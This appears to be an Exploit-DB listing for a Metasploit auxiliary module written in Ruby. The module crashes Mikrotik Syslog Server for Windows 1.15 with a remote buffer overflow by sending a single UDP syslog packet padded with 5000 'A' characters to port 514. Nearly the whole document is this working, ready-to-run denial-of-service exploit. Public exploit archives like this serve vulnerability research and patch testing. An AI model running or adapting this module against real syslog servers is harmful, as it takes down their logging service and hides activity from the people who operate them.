Mikrotik Syslog Server for Windows 1.15 - Denial of Service (Metasploit)

Author: xis_one
type: dos
platform: windows
port: 514.0
date_added: 2013-04-22  
date_updated: 2013-04-24  
verified: 1  
codes: OSVDB-92744  
tags: Metasploit Framework (MSF)  
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comMT_Syslog.exe  

raw file: 24968.rb  
# Exploit Title: Mikrotik Syslog Server for Windows - remote BOF DOS
# Date: 19.04.2013
# Exploit Author: xis_one@STM Solutions
# Vendor Homepage:  www.mikrotik.com
# Software Link: http://www.mikrotik.com/download/MT_Syslog.exe
# Version: 1.15 (most recent version 19.04.2013)
# Tested on: Windows XP SP3, Windows 7 SP1

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::Remote::Udp
	include Msf::Auxiliary::Dos

	def initialize
		super(
			'Name'        => 'Mikrotik Syslog Server for Windows - remote BOF DOS',
			'Description' => %q{
					This module triggers the windows socket error WSAEMSGSIZE (message to long)
                                        in the Mikrotik Syslog Server for Windows v 1.15 and crashes it.
                                        The long syslog message overwrite the allocated buffer space causing the socket error.

			},
			'Author'      => 'xis_one@STM Solutions',
			'License'     => MSF_LICENSE,
			'DisclosureDate' => 'Apr 19 2013')

		register_options(
			[
				Opt::RPORT(514)
			])
	end

	def run
		connect_udp
		pkt = "<0>" + "Apr19 " +  "10.0.0.2 " + "badass" + ": " + "A"*5000
		print_status("Crashing the remote Mikrotik syslog server #{rhost}")
		udp_sock.put(pkt)
		disconnect_udp
	end
end